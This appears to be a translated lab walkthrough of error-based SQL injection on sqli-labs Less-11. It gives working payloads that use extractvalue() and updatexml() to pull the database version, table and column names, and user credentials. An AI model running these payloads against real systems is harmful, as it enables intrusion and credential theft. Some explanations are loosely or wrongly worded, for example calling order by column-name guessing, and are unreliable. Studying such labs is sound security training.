Software used: phpstudy (MySQL5.7.26, PHP5.3.29), sqli-labs shooting range, Burp Suite, Google Chrome, win11
Functions used for error reporting and echoing
updatexml()
extractvalue()
Shooting range drill
Step 1 – Determine whether to use single quotes or double quotes.
Step 2 – Guess the column name
Step 3 – Blind injection using extractvalue() function
Step 4 – Find the table name
Step 5 – Find fields in the table
Step 6 – Get the data in the field
Replenish
updatexml() function
or
Blind injection means that during the injection process, the acquired data cannot be displayed on the front-end page. At this time, we need to use some methods to judge or try. We call it blind injection, and error echo is one of them.
Function used for error reporting and echoing
updatexml()
- Change the string containing the queried value from the target XML
- updatexml(XML_document,XPath_String,new_value);
- The first parameter: XML_document is in String format and is the name of the XML document object. The text is DOC.
- Second parameter: XPath_string (Xpath format string)
- The third parameter: new_value, String format, replaces the found data that meets the conditions
extractvalue()
- Returns a string containing the queried value from the target XML
- extractvalue(XML_document,XPath_String)
- The first parameter: XML_document is in String format and is the name of the XML document object. The text is DOC.
- Second parameter: XPath_String (Xpath format string)
Shooting range drill
The practice range is sqli-labs/Less -11 and extractvalue() functions are examples
The first step – determine whether to use single quotes or double quotes
We use symbols (‘”) to determine what symbol is used to close the code at our injection point, which facilitates our subsequent injection.
uname=zhangsan '" & amp;passwd=123123 & amp;submit=Submit
Step 2-Guess the column name
To guess the column name, we will use the function order by. Fill in the number after the function to guess the column name.
uname=zhangsan' order by 3 -- + & amp;passwd=123123 & amp;submit=Submit
The third step-Blind injection using the extractvalue() function
Remember that the extractvalue() function has two parameters mentioned above, one of which is XPath_String (Xpath format string), but when we perform blind SQL injection based on error reporting, we put the parameters into the XPath format Inject by inputting other formats
uname=zhangsan' union select 1,extractvalue(1,(select version())) -- + & amp;passwd=123123 & amp;submit=Submit
But obviously the version is not fully displayed, so we use another function concat() to allow our information to be fully displayed.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select version()))) -- + & amp;passwd=123123 & amp;submit=Submit
Here 0x7e is converted from hexadecimal to decimal, which is the tilde (~)
Step 4-Look up table name
This step is the same as the previous step. Enter our SQL injection statement where the XPath format was originally entered.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(table_name)from information_schema.tables where table_schema=database()))) -- + & amp;passwd=123123 & amp; submit=Submit
But obviously the data displayed here is more than 1 row, so we will use another function Limit
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(table_name)from information_schema.tables where table_schema=database()limit 0,1),0x7e)) -- + & amp; passwd=123123 & amp;submit=Submit
The 0 and 1 after limit represent the bit of data starting from subscript 0. If you look at the table name behind, change 0 to 1, and so on for the subscript.
Step 5-Look up fields in the table
Find the table we want to query from the previous step (such as the users table), and blindly search for the fields in the table
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select(column_name)from information_schema.columns where table_name=0x7573657273 limit 0,1),0x7e)) -- + & amp;passwd= 123123 &submit=Submit
0x7573657273 is hexadecimal and changed back to users because some injection points only support hexadecimal.
Step 6-Get the data in the field
Through the previous step, we can get the fields in the table, and then get the data in the fields through these fields.
uname=zhangsan' union select 1,extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password)from users))) -- + & amp;passwd=123123 & amp;submit=Submit
Supplement
updatexml() function
The blind injection method of this function is the same as the extractvalue() function, but it just has one more parameter.
updatexml(XML_document,XPath_String,new_value);
uname=zhangsan' union select 1,updatexml(1,concat(0x7e,(select version())),1 ) -- + & amp;passwd=123123 & amp;submit=Submit
Enter our SQL statement in the original second parameter position for injection.
Note: The numbers in the first and second parameters should be as consistent as possible. If they are not the same, sometimes an error will be reported.
or
We can also use or to inject
'or updatexml(1,concat(0x7e,database()),0)or'
' or extractvalue(1,concat(0x7e,database())) or'
Note: The last or must be followed by quotation marks.